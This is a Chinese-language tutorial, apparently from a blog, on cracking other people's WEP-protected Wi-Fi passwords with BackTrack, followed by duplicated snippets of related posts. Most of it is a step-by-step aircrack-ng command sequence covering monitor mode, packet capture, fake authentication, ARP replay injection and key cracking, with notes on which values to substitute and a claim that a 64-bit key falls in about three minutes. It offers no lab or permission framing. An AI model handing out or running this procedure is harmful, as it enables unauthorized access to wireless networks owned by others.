無線網路破解,破解wap密碼,用backtrack破解web密碼
需要的全部指令:
(紅色字型的需要替換自身引數)
1) ifconfig -a
(可以檢視到自己機子無線網絡卡的mac位址和無線網絡卡的裝置名稱《通常為usb0或者wlan0>), 保留這個視窗方便下幾步檢視需要的資訊, 開啟新命令視窗進入一步)
2) airmon-ng start
wlan0 2
(wlan0為無線網絡卡, 2為需要監聽的頻道, 根據自己情況輸入, 此步驟為開啟無線網絡卡的監聽模式)
3) airodump-ng –ivs -w name -c
2 wlan0
(獲取頻道2的所有無線ap的資訊, wlan0是無線網絡卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入後會顯示周圍所有頻道為*的無線ap,
顯示的列表:
bssid : 無線ap的mac 位址
pwr: ap訊號的大小
rxq: 干擾值
beacons:傳送和接受的資料報, 有資料傳輸的時候就會跳動
#data: 資料, 破解需要的最關鍵的就是這個
ch:頻道
mb:網路連線速度
essid: ap的名稱
保留這一視窗, 開啟新的命令視窗進入下一步)
4) aireplay-ng -1 0 -e
ap_essid -a
ap_mac -h
*********x wlan0 -1 is -one
(傳送欺騙, ap_essid為ap的名稱, 例如linksys或者tp-link, ap_mac為ap的mac位址, 第三步的bssid就是ap的mac位址,
*********x 為自己無線網絡卡的mac位址, 第一步可以看到. 這一步成功後會顯示successful, 如不成功需要在訊號強的地方重試, 成功後才可以進入下一步)
5) aireplay-ng -3 -b ap_mac -h
*********x -x 1024 wlan0
(ap_mac為無線ap的mac位址, 具體看步驟3,
*********x 為無線網絡卡的mac位址, wlan0為網絡卡, 這一步執行以後, 開始正確的收發資料報, #data開始**)
6) aircrack-ng -n
64 -b
ap_mac name-01.ivs
(開始破解, ap_mac為ap的mac位址, 64指的是使用了64位加密, 多次破解失敗的話可以試128)
多數情況下當#data開始迅速跳動的時候就可以開始破解了, 不需要等到多少包, 如果#data這個資料增長緩慢的話, 換個位置到無線訊號強的地方再試, 命令輸入正確的話最快3分鐘搞定乙個64位加密的web ap是沒問題的!
無線網路破解,破解wap密碼
無線網路破解
無線網路破解,破解wap密碼,用backtrack破解web密碼 需要的全部指令 紅色字型的需要替換自身引數 1 ifconfig a 可以檢視到自己機子無線網絡卡的mac位址和無線網絡卡的裝置名稱 通常為usb0或者wlan0 保留這個視窗方便下幾步檢視需要的資訊,開啟新命令視窗進入一步 2 ai...
無線網路破解
無線網路破解,破解wap密碼,用backtrack破解web密碼 需要的全部指令 紅色字型的需要替換自身引數 1 ifconfig a 可以檢視到自己機子無線網絡卡的mac位址和無線網絡卡的裝置名稱 通常為usb0或者wlan0 保留這個視窗方便下幾步檢視需要的資訊,開啟新命令視窗進入一步 2 ai...
破解無線網路金鑰
iwconfig cd user local etc vim kismet.conf find source then change as follows source finally input cammand kismet,then show shell kosole press s and c...